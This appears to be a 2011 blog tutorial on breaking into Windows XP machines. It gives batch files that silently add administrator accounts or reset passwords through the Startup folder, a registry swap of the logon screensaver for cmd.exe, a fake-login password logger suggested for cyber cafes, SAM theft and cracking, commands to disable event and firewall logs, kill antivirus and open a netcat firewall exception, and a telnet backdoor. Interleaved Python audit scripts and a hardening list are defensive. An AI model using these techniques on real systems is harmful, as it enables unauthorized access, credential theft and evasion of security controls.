
Saturday, May 7, 2011

Useful Windows hacking commands... and uses

1. First thing to try

OK, let's start with the very basics. This is a method that a LOT of Windows boxes are vulnerable to. The people most often vulnerable to it are those who bought their box with Windows XP already on it (i.e. it was installed by the manufacturer or the shop that sold it).
When they do this, they do not set an administrator password, simply because there would be no effective way of telling the buyer that password, considering how many are sold every day all over the world.

OK, so enough chat. Go to the login screen, hold Ctrl+Alt and press Delete twice. A login box should pop up.
Enter the username administrator and leave the password blank. If you log in, congratulations, you are now administrator on a Windows box (wow! that's 1337!! *looks sarcastic*).
If you don't log in, then try admin or administrator as the password. If not, never mind. We still have tonnes of ways to try before we give up and smash the damn thing with a hammer.

2. Alternative first thing to try.

Now, if 1) doesn't work this won't either, as it's just a different way of accomplishing 1). When the PC is booting, press F8 or F5 and select boot in safe mode. Then try and click on administrator.

ta-da

3. Underhand trickery.

This method will add you as a user by placing a batch file in this folder:

C:\Documents and Settings\<admin user>\Start Menu\Programs\Startup

In the batch file, have something to add you to the administrators group. Here is one:
#####################################start#############################

@title Windows Security check up
net user <put your username here> <password here> /ADD
@cls
net localgroup administrators <the account name above> /ADD
@cls
exit
#######################################end#############################

Put that in Notepad, save it as checkup.bat and put it in the above folder. *Make sure you replace everything you need to first.*

This will flash up for a fraction of a second on most PCs, and if you're lucky they may be looking away and not notice, and if they do notice they will have no idea what it did......

Now just hope they don't see your new user. This works best if there are lots of users.

Please note that from a limited account you can't access other people's documents, so you will have to be sneaky and copy it there when they go to the loo or something.

4. Another underhand method.

This is the same concept as above, but here's what the batch file says:

#######################################start###########################

@title windows check-up service
net user administrator admin
cls
exit

#########################################end###########################

This is probably the best method, as long as the person who is in the administrators group doesn't use that account.
It changes the administrator password to admin, so just log in like in section one, but now you know the password.....

To add those files all you need to do is place them in the startup folder like above. It doesn't matter how, but it's very possible for you to do it from a guest or limited account if the person who is admin is stupid.
All you need is to make sure their files aren't private...
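The defensive counterpart of sections 3 and 4 is to look in the Startup folders for exactly these batch files, which the hardening list later in this post (8.7, item 6) recommends. The Python script below is an added example, not code from the original post: it walks a Documents and Settings-style profile tree, flags .bat/.cmd files containing net user /ADD, net localgroup administrators /ADD, a bare password reset or net stop, and, going beyond the two batch files above, reports any executable dropped into a Startup folder. The profile tree, user names, file names and batch contents are constructed fixtures so it runs anywhere; on a real XP machine you would pass C:\Documents and Settings to scan_startup_folders.

```python
r"""Audit per-user Startup folders for the batch-file tricks in sections 3 and 4.

Added example, not code from the original post. It assumes the XP layout the
post gives (<profiles>\<user>\Start Menu\Programs\Startup) and builds a
throwaway copy of that layout with constructed files so it runs anywhere.
"""
import re
import shutil
import tempfile
from pathlib import Path

# Commands that have no business in a Startup batch file. Matched per line,
# case-insensitively, after stripping the '@' echo-suppression prefix.
SUSPICIOUS_COMMANDS = {
    "adds local account": re.compile(r"\bnet\s+user\s+\S+\s+\S*\s*/add\b", re.I),
    "adds to administrators": re.compile(r"\bnet\s+localgroup\s+administrators\b.*/add\b", re.I),
    "resets a password": re.compile(r"\bnet\s+user\s+\S+\s+\S+\s*$", re.I),
    "stops a service": re.compile(r"\bnet\s+stop\b", re.I),
}
# Anything directly executable dropped into Startup is worth a look as well.
EXECUTABLE_SUFFIXES = {".exe", ".com", ".scr", ".pif", ".vbs"}


def scan_batch_file(path: Path) -> list:
    """Return (path, line number, reason, line) for every suspicious line."""
    findings = []
    for lineno, raw in enumerate(path.read_text(errors="replace").splitlines(), 1):
        line = raw.strip().lstrip("@")
        for reason, pattern in SUSPICIOUS_COMMANDS.items():
            if pattern.search(line):
                findings.append((str(path), lineno, reason, line))
    return findings


def scan_startup_folders(profiles_root: Path) -> list:
    """Walk every profile's Startup folder under profiles_root."""
    findings = []
    for profile in sorted(p for p in profiles_root.iterdir() if p.is_dir()):
        startup = profile / "Start Menu" / "Programs" / "Startup"
        if not startup.is_dir():
            continue
        for item in sorted(startup.iterdir()):
            suffix = item.suffix.lower()
            if suffix in (".bat", ".cmd"):
                findings.extend(scan_batch_file(item))
            elif suffix in EXECUTABLE_SUFFIXES:
                findings.append((str(item), 0, "executable in Startup folder", item.name))
    return findings


def build_sample_tree() -> Path:
    """Constructed fixture mimicking C:\\Documents and Settings with two users."""
    root = Path(tempfile.mkdtemp(prefix="docs_and_settings_"))
    for user in ("alice", "bob"):
        (root / user / "Start Menu" / "Programs" / "Startup").mkdir(parents=True)
    alice = root / "alice" / "Start Menu" / "Programs" / "Startup"
    bob = root / "bob" / "Start Menu" / "Programs" / "Startup"
    (alice / "Notes.lnk").write_text("")                     # benign shortcut placeholder
    (alice / "svc.cmd").write_text(                           # section 4 style: reset admin password
        "@title windows check-up service\nnet user administrator admin\ncls\nexit\n")
    (bob / "checkup.bat").write_text(                         # section 3 style: add + elevate a user
        "@title Windows Security check up\nnet user evil Passw0rd /ADD\n@cls\n"
        "net localgroup administrators evil /ADD\n@cls\nexit\n")
    (bob / "tlntsvr.exe").write_bytes(b"MZ")                  # a copied system binary (constructed)
    return root


def audit_sample() -> list:
    """Build the fixture, scan it, clean up, and return the findings."""
    root = build_sample_tree()
    try:
        return scan_startup_folders(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for path, lineno, reason, text in audit_sample():
        print(f"{reason:30} {path}:{lineno}  {text}")
```

The patterns deliberately distinguish a bare `net user NAME PASSWORD` (a reset) from `net user NAME PASSWORD /ADD` (a new account), because both appear in this post and you want to know which one you are looking at.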

5. Accessing all files on the computer, with the exception of certain system files like the SAM

OK, just suppose you want to access the admin account to read their saved MSN history, for example. Or maybe they are stupid (like most computer users) and have a file with their passwords so they don't have to remember them, just their login for that computer.
The reasons are endless. Now, if the person has any knowledge about computers they will make all of their files private so only they can see them....

Ah, so how can I get to their files then??

Well, it's very simple and can be done from any account with registry write access. It may be achievable from the guest user, as there are many tools that allow registry editing even if you're not admin. (I'm not sure exactly if they actually work, but if they do, whee!!)

If you go to the registry entry:

my computer\HKEY_USERS\S-1-5-18\Control Panel\Desktop

(*the number in the middle may vary on your PC)

Now you should see a lot of interesting things. Here's the important one:

SCRNSAVE.exe logon.scr

or something like that.
As we all know, .scr is a screen saver, so this is where the screen saver is defined that runs when the login screen has sat motionless for a certain time.

So, this is good to know: we can change the screen saver at the login screen.
But hey, wait, let's think about this. What if we replaced logon.scr with something else, another program? Hey, what about command prompt?

Try it: change logon.scr to cmd.exe.
Now the problem is that we have to wait ages for the screen saver to activate, so above that there should be a ScreenSaveTimeOut option. Change that from whatever it is (600 default) to 1. Now log off, wait 1 second and you have a command prompt!!
You can access private directories etc.
Also, you can run any program from the command prompt, like a super user, wow!

Now, if you can't write to that part of the registry, then it can be achieved through the command line (as well as a batch file). The command is reg. Work it out yourself!!
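From the defender's side, the trick above leaves two obvious fingerprints in that key: a SCRNSAVE.EXE value that is not a .scr file and a ScreenSaveTimeOut far below the 600-second default. The Python below is an added example, not code from the original post: it parses the text that `reg query` prints for the key the post names and reports both conditions, so it can run over output saved from any machine. The two sample outputs are constructed, and the 60-second threshold is an auditing assumption.

```python
r"""Check the logon-screen saver values from section 5 for tampering.

Added example, not code from the original post. It parses the output of
`reg query "HKU\S-1-5-18\Control Panel\Desktop"` (the key the post names),
so it can be run over saved output. Both samples below are constructed; the
60-second threshold is an auditing assumption.
"""
import re

# One value line of reg query output, e.g.
#     SCRNSAVE.EXE    REG_SZ    logon.scr
VALUE_LINE = re.compile(r"^\s+(?P<name>.+?)\s+(?P<type>REG_[A-Z_]+)\s*(?P<data>.*)$")

MIN_SANE_TIMEOUT = 60   # seconds; the default is 600, an attacker sets 1


def parse_reg_query(text: str) -> dict:
    """Return {value name: (type, data)} for the key's values."""
    values = {}
    for line in text.splitlines():
        m = VALUE_LINE.match(line.rstrip())
        if m:
            values[m.group("name")] = (m.group("type"), m.group("data").strip())
    return values


def audit_logon_screensaver(text: str) -> list:
    """List reasons this Desktop key looks tampered with; an empty list means clean."""
    values = {k.upper(): v for k, v in parse_reg_query(text).items()}
    findings = []
    scr = values.get("SCRNSAVE.EXE", (None, ""))[1]
    if scr:
        # A screen saver is a .scr; cmd.exe or any other extension is a red flag.
        if not scr.lower().endswith(".scr"):
            findings.append(f"SCRNSAVE.EXE points at {scr}, which is not a .scr file")
        # An explicit path outside the system directory is equally suspicious.
        if "\\" in scr and not scr.lower().startswith("c:\\windows\\system32\\"):
            findings.append(f"SCRNSAVE.EXE uses a path outside system32: {scr}")
    timeout = values.get("SCREENSAVETIMEOUT", (None, ""))[1]
    if timeout.isdigit() and int(timeout) < MIN_SANE_TIMEOUT:
        findings.append(f"ScreenSaveTimeOut is {timeout}s; the default is 600s")
    return findings


# Constructed sample: the values as they ship.
CLEAN_OUTPUT = """
! REG.EXE VERSION 3.0

HKEY_USERS\\S-1-5-18\\Control Panel\\Desktop
    ScreenSaveActive\tREG_SZ\t1
    ScreenSaveTimeOut\tREG_SZ\t600
    SCRNSAVE.EXE\tREG_SZ\tlogon.scr
"""

# Constructed sample: the values after the section 5 trick.
TAMPERED_OUTPUT = """
! REG.EXE VERSION 3.0

HKEY_USERS\\S-1-5-18\\Control Panel\\Desktop
    ScreenSaveActive\tREG_SZ\t1
    ScreenSaveTimeOut\tREG_SZ\t1
    SCRNSAVE.EXE\tREG_SZ\tcmd.exe
"""

if __name__ == "__main__":
    for label, sample in (("clean", CLEAN_OUTPUT), ("tampered", TAMPERED_OUTPUT)):
        print(label, audit_logon_screensaver(sample) or ["no findings"])
```

The parser tolerates both the tab-separated layout of the XP-era reg.exe and the space-padded layout of later versions, since the regex only requires whitespace between the value name, the type and the data.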


6. Theoretical Windows password logger.

Now I am currently in the stages of building this in VB (come on, cut me some slack, I know VB is an HLL and frankly quite n00bish, but it will be so much quicker, and the commands are straightforward. Hell, I'm not going to spend months programming something with that much GUI in something like Perl, or assembly, or any of those powerful languages that take ages to program a decent interactive GUI in {like Perl or asm}).

Well, enough ranting about VB and programming. This is my idea, which I share with you freely.
Since you can execute an .exe as a screen saver and it will not return from the screen saver until that program is closed, we could fashion a fake login screen to look the same as the real one, but give a fake "password incorrect" message when the password is typed, and then log the input to a text file, so we then have a list of usernames and passwords for this computer. And it can all be done without admin rights, assuming you can access VB or whichever app you chose to program in, and have a cracked registry editor to allow you to switch logon.scr with your app (please note you have to give the full path of the app if the system doesn't find it on its own {i.e. go to Run and type the name of the app without the path, and if it doesn't run then you need to put the whole path in. For example, you only need to type cmd.exe, not C:\windows\system32\cmd.exe}).

So, now we can see how somebody with a moderate knowledge of a basic HLL (i.e. VB) can get a list of passwords for all the users. This works very well if the computer has a lot of users.

*Here's a thought: get everything you need to do this on a CD/USB stick, whatever, and do this in a cyber cafe which requires you to have an account. Now that's a lot of passwords you could get.*

N.B. this idea was formed after seeing and programming a fake MSN login to get passwords and usernames. It's the same effect really. That's another thing you could put in a cyber cafe, and there you go, a load of MSN passwords with usernames.

({Also, remember, you can use the free VB.NET, but this requires some runtimes and files and environment stuff that will need to be installed for the file to work. You are given the option to do this at install time, but it's a lot less convenient. As far as I know VB 6.0 can run on most XP SP2 boxes.})

7. Manipulation of various things.

OK, this section is about dispelling some of the hacking myths about Windows. People seem to assume that some stuff will work without actually testing it.

7.1 Cain

Now, on some of the forums I visit, some people seem to think that Cain can hack for you. Nope. You cannot run Cain without local administrator rights. That's right kids, those of you who think that you can put it on a USB stick, dump the hashes, crack them and get access are sadly wrong.
It will not work.

However, what will work is if you obtain the hashes and the encryption key: you can crack them to get hashes Cain can crack, albeit on another computer where you are admin.

7.2 SAM myths

OK, the SAM file. It seems that people say stuff about hacking Windows without ever actually having hacked a Windows box. The SAM file cannot be obtained through an MS-DOS floppy. Some guy must have thought of the idea, decided there was no reason why it wouldn't work, and published a tutorial about it without ever trying it.

7.3 command prompt myths

OK, now it's everywhere: people saying if you're a limited user, just type "net user <admin name> <what you want their password to be>" and it will change their password.
This has never worked for me. People have told me it works, but I'll bet they just tried it on the account they were on, which is most likely a computer administrator, who can execute that command. Limited users can't, though.

7.4 Two ways to obtain the SAM file that actually work, and that I have personally tried out.

1)

NTFS bootable floppy disk

OK, get a blank floppy and go to www.nfts.com (if not, try .org). There they have a tool to create a boot floppy. Download it, run it, and create a bootable floppy. Now shut down, put the floppy in the drive and boot the PC. Hopefully it should boot from the floppy. This DOS-style GUI will allow you to scan for deleted files, securely delete files, and of course view and edit ANY files (including copy!!)

So simply navigate to the SAM (C:\windows\system32\config\ **learn that location by heart. Also learn all the locations of important programs, and learn all of the commands for command prompt, and registry syntax and stuff, by heart. It's very useful**)

and now copy the SAM, SYSTEM and SECURITY files (those are the names). You may need to swap floppies to fit them on.

2) Linux live CD

This is the method most seasoned hackers prefer. It can be a lot quicker if you know what you are doing. This varies from live CD to live CD, but basically boot it up like you did with the floppy, then mount the partition that has Windows on it (look at the instructions on how to do this), then navigate to the directory with the SAM and just copy the files, and put them somewhere like your documents.

What to do once you have the SAM and the other files

OK, basically, you will need to load the SAM file into a SAM cracker that will allow you to decrypt the hashes using the SYSTEM and SECURITY files. SAMInside is an example.
So, crack them to get the NTLM hashes, load them into Cain and crack them to get a full list of passwords for that machine.

It's not as difficult as it sounds.

Right, so now you have a detailed knowledge of how to get admin access on any single Windows box.
Some of these methods also work for network hacking. The add-user and change-password methods will work, and I haven't tried the fake login screen but that could possibly work as well. (You could always cut the network cable out, hack your way onto an account on the local machine, and find the administrator password; chances are it will be the same as the network admin password, as long as the same person set them up.
If you're on a networked computer but as a standalone box, you could run the fake login screen you made, tell the admin you can't log in and watch them as they log in, and bingo, you have their password. Hope you got all that.)

8. Misc Windows hacking stuff.

OK, this is basically some things relating to hacking Windows that will not strictly gain you access to admin. Please note that I have not tried all of these from a guest user, but on admin they all work. As far as I am aware the logs can be disabled by any user who has access to the system32\config directory (and by default all users do).

Also, this can all be achieved through the Windows GUI quite easily, and the commands seem to be more useful for those who have remote console access but can't run anything outside the console.

8.1 To end the Windows Security Centre:

Batch file/command from command prompt:
###############################start##################################

@net stop "security Center"

##############################end#####################################

Simple but deadly.

This will end the Windows firewall until they restart their PC. This means you could get this to be run and then set up something to give you a remote shell.

Command to end a process. Please note you cannot use this to end a system process; that must be done through Task Manager.

#######################################start###########################

tskill <processname>

######################################end#############################

e.g. tskill cmd
That will end command prompt. Don't put the extension on, like .exe.

If you have a remote shell you can just type taskmgr.exe and press enter to get the Task Manager, and yeah (unless your shell is configured to only allow console access).

So, this could in theory end stuff like explorer.exe from a remote shell.

To start the control panel:

####################################start##############################
control
####################################end################################

Just type this and the control panel will pop up. This doesn't really have much use in a batch file.

However, it could be very useful remotely.

8.2 Windows XP logs.

How to disable the Windows XP logs.

###########################start#######################################

attrib +R Sysevent.evt
attrib +R Secevent.evt
attrib +R AppEvent.evt

############################end########################################

Wow, that sets the read-only attribute, so they can't be written to.
Please note this is not comprehensively tested by me... in theory it should work but I can't guarantee it..
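A defender checking for this trick can simply look at the attributes of the three log files. The Python below is an added example, not code from the original post: it parses the output of `attrib` run against the files named above (in the system32\config directory the post gives) and reports any event log that is read-only, hidden or system-marked, or missing from the listing. The sample attrib output is constructed.

```python
r"""Spot the section 8.2 trick: event log files made read-only with attrib +R.

Added example, not code from the original post. It parses the output of
`attrib C:\WINDOWS\system32\config\*.Evt` (the directory the post names), so
it can run over saved output; the sample below is constructed.
"""
import re

EVENT_LOGS = ("AppEvent.Evt", "SecEvent.Evt", "SysEvent.Evt")

# attrib prints the attribute letters in fixed columns, then the full path:
#     A    R       C:\WINDOWS\system32\config\SecEvent.Evt
ATTRIB_LINE = re.compile(r"^(?P<flags>[A-Z ]*?)\s*(?P<path>[A-Za-z]:\\.*)$")


def parse_attrib(text: str) -> dict:
    """Map each listed path to the set of attribute letters attrib shows for it."""
    result = {}
    for line in text.splitlines():
        m = ATTRIB_LINE.match(line.rstrip())
        if m:
            result[m.group("path")] = set(m.group("flags").replace(" ", ""))
    return result


def audit_event_log_attributes(text: str) -> list:
    """Report event log files that are read-only, hidden/system, or missing."""
    wanted = {name.lower(): name for name in EVENT_LOGS}
    findings, seen = [], set()
    for path, flags in parse_attrib(text).items():
        name = path.rsplit("\\", 1)[-1].lower()
        if name not in wanted:
            continue
        seen.add(name)
        if "R" in flags:
            findings.append(f"{wanted[name]} is read-only, which is not how Windows ships it")
        if flags & {"H", "S"}:
            findings.append(f"{wanted[name]} is hidden or system-marked, which is not the default")
    for name in EVENT_LOGS:
        if name.lower() not in seen:
            findings.append(f"{name} not present in attrib output")
    return findings


# Constructed sample: the application log untouched, the other two made read-only.
SAMPLE_ATTRIB = r"""
A            C:\WINDOWS\system32\config\AppEvent.Evt
A    R       C:\WINDOWS\system32\config\SecEvent.Evt
A    R       C:\WINDOWS\system32\config\SysEvent.Evt
"""

if __name__ == "__main__":
    for finding in audit_event_log_attributes(SAMPLE_ATTRIB):
        print(finding)
```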

8.2.5

Another tool to clear your logs, which is just as effective as disabling them. It's called clearlog.. Google it.

8.3 How to set up a backdoor straight through the Windows firewall.

OK, you have a command prompt shell, but you want to be able to keep it. You could, for example, set up netcat to listen for your telnet attempt. But what about the firewall?
Well, in your remote command prompt type:

##################################start################################

netsh firewall add allowedprogram C:\netcat.exe "Security checker" ENABLE

##################################end##################################

That will set the name of the exception to Security checker and will mean that you will not be warned about netcat by the firewall, so it can be undetectable if you run it in trojan mode..

To display the current config of the firewall:

###################################start###############################

netsh firewall show config

###################################end#################################

Also, try:

####################################start##############################

netsh firewall show logging

###################################end#################################


That will give you information about the log, which you could delete, clear of all data, or disable like this:

####################################start##############################

netsh firewall set logging <the file location in 'show logging'> 0 {connections = DISABLE}

###################################end#################################

The number is the max size, so setting it to 0 will clear it. If you put in the bit in the curly brackets (don't include the brackets!!!) it will disable logging of all connections.
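Checking for the changes in this section is what item 5 of the hardening list later in the post (8.7) asks for. The Python below is an added example, not the post's own code: it parses `netsh firewall show config` output into per-profile settings, program exceptions and log settings, then reports a profile whose firewall is off, an enabled exception whose program sits outside a set of trusted roots (the netcat case above), and logging that has been switched off. The sample output is constructed to mimic the XP SP2 layout; the trusted roots are an assumption you would tune per machine.

```python
r"""Audit `netsh firewall show config` output for the changes in section 8.3.

Added example, not code from the original post. The sample output below is
constructed to follow the XP SP2 layout (section headings ending in ':',
dashed rules, 'Name / Program' rows); the trusted roots are an auditing
assumption.
"""
import re

# Where a legitimate exception's program should live. Anything else
# (C:\netcat.exe, a profile folder, a USB stick) gets reported.
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\")

ALLOWED_ROW = re.compile(r"^(Enable|Disable)\s+(.+?)\s+/\s+(.+)$")
KEY_VALUE = re.compile(r"^(.+?)\s*=\s*(.+)$")


def parse_netsh_firewall_config(text: str):
    """Return (profiles, programs, log).

    profiles: {section heading: {setting: value}}
    programs: [(mode, exception name, program path)]
    log:      {setting: value} from the 'Log configuration' section
    """
    profiles, programs, log = {}, [], {}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or set(line) == {"-"}:
            continue
        if line.endswith(":"):
            section = line[:-1]
            if "profile configuration" in section:
                profiles[section] = {}
            continue
        if section is None:
            continue
        if "Allowed programs" in section:
            m = ALLOWED_ROW.match(line)          # header row has no Enable/Disable, so it is skipped
            if m:
                programs.append((m.group(1), m.group(2), m.group(3)))
        elif "Log configuration" in section:
            m = KEY_VALUE.match(line)
            if m:
                log[m.group(1)] = m.group(2)
        elif "profile configuration" in section:
            m = KEY_VALUE.match(line)
            if m:
                profiles[section][m.group(1)] = m.group(2)
    return profiles, programs, log


def audit_firewall(text: str, trusted_roots=TRUSTED_ROOTS) -> list:
    """Findings a defender would act on; an empty list means nothing stood out."""
    profiles, programs, log = parse_netsh_firewall_config(text)
    findings = []
    for name, settings in profiles.items():
        if settings.get("Operational mode", "").lower() != "enable":
            findings.append(f"{name}: firewall is not enabled")
    for mode, name, program in programs:
        if mode.lower() == "enable" and not program.lower().startswith(trusted_roots):
            findings.append(f"exception '{name}' allows {program}, outside the trusted roots")
    for key in ("Dropped packets", "Connections"):
        if log.get(key, "").lower() != "enable":
            findings.append(f"logging of {key.lower()} is off")
    return findings


# Constructed sample output, including the exception the post adds.
SAMPLE_CONFIG = r"""
Domain profile configuration:
-------------------------------------------------------------------
Operational mode                  = Enable
Exception mode                    = Enable

Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode                  = Enable
Exception mode                    = Enable
Notification mode                 = Enable

Service configuration for Standard profile:
Mode     Customized  Name
-------------------------------------------------------------------
Enable   No          File and Printer Sharing

Allowed programs configuration for Standard profile:
Mode     Name / Program
-------------------------------------------------------------------
Enable   Security checker / C:\netcat.exe
Enable   Remote Assistance / C:\WINDOWS\system32\sessmgr.exe

Log configuration:
-------------------------------------------------------------------
File location   = C:\WINDOWS\pfirewall.log
Max file size   = 4096 KB
Dropped packets = Disable
Connections     = Disable
"""

if __name__ == "__main__":
    for finding in audit_firewall(SAMPLE_CONFIG):
        print(finding)
```

Reviewing exceptions by program path rather than by name is the point: the exception name is attacker-chosen and "Security checker" tells you nothing, while the path does.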

8.4 End virus scanners.

OK, this is not just a command; it can be put in batch files as well.

We know how to end the Windows firewall and Security Centre, and to end independent processes we have to know what they are.
We could do a batch file that searches for all the normal locations of a virus scanner, and the normal types. For this we would need to do some research, which I will leave to you.
Here's an example: how to end anti virus guard.

#############################start#####################################

TASKKILL /F /IM avgnt.exe

##############################end######################################

We can see how useful that could be.

Now, this can be useful because virus scanners often pick up exploits, so ending them helps us in some way....


8.5 OK, so you know what to do, how to do it...


Right, now most people know that a Windows XP box doesn't listen for incoming connections that could be useful to a hacker, such as telnet.
However, not many people know that XP has a telnet server by default which will accept telnet attempts when it's running. However, it doesn't run by default.

To run it, the command is:

#######################################################################

tlntsvr

#######################################################################

You know all the ways you can execute that.

Now, be aware it does ask for a login, and doesn't accept blank passwords, for administrator for example.
However, this can be a very useful back door as it is silent, and doesn't require command line options like netcat.
This means no annoying batch file to execute it in trojan mode every time. If you just place it in the startup folder it's always running.

So, just assume you could have a single batch file like this:

####################################start##############################

@title Windows Check-up
@copy "C:\windows\system32\tlntsvr.exe" "C:\Documents and Settings\<user>\Start Menu\Programs\Startup"

################################end####################################

OK, so now you know. Also you can edit the settings and various authentication methods. I'm not gonna tell you everything. You can do some research; after all, I have got you this far.

8.6
This is a small section; it's just the command to alter the registry from the command line. It's simply:
###################################start###############################

reg

####################################end################################

The options and syntax are given when you type it.

8.7 How to secure your Windows box from hacking attempts.

OK, the title says it all. Here's a list of the things that come to mind.

1. Have a decent virus scanner, and make sure it is up to date.
2. Run another firewall, not the Windows one.
3. Make sure the administrator password is longish.. and not in the dictionary.
4. Disable all registry access for all non-admins.
5. Check your firewall for exceptions often. Make sure you know about them all.
6. Make a point of checking your startup folder.
7. Deny access to the Windows files for non-admins.
8. Configure everything. Don't have the default locations for important things like firewall logs.
9. If something like a command box pops up when you log on, and it goes too quickly to see what it said, check all your users' status and access rights. Check all important places to make sure everything is OK.
10. Be sensible. Don't accept NAKED_CHICZ.jpeg.exe.
11. Back up everything important. If you need to keep your passwords somewhere, keep them on a USB stick or something so that an attacker cannot view your files and get your passwords for every site and account you own.

Well, that's all I can think of for now...



9.0 Recap etc

OK, so in this tutorial we have learnt a lot. We know how to add users and administrators to a local PC, we know how to disable XP logs, we know how to end the firewall, we know how to make an exception in the firewall, we can end the Security Centre, we can end processes that we want to end, we can disable the firewall logs, we can get and decrypt the SAM file, and we have covered what commands and things don't work. We have done a registry edit to allow us to view and edit any files not in use on the PC, regardless of the security restrictions on them.

It is possible, if you are on the PC, to enable a guest user as a telnet account.

Now that's a lot. And it doesn't involve some stupid sk tools that give you higher privileges without any effort.
I will admit that if this is done remotely then you may need to use a trojan of some kind to spawn you a command prompt shell. However, you may not; for example, they may be running the bios port, which is usually considered the easiest remote hack for Windows.
They may run a website off their box, which is a possible way in if it's self-coded, or even poorly coded.
Also look out for port 79, the finger port, which will give you info about the computer.

Also, my final command for you to try is the 'systeminfo' tool. It will give you some useful info and a lot about the hardware of the PC.

Please tell me if something in here is wrong. I did get very tired typing this and there are probably some mistakes... don't tell me about typos unless they are in commands...

That's about it, a fairly comprehensive tutorial on hacking Windows XP, by (0)-_360_-(0)
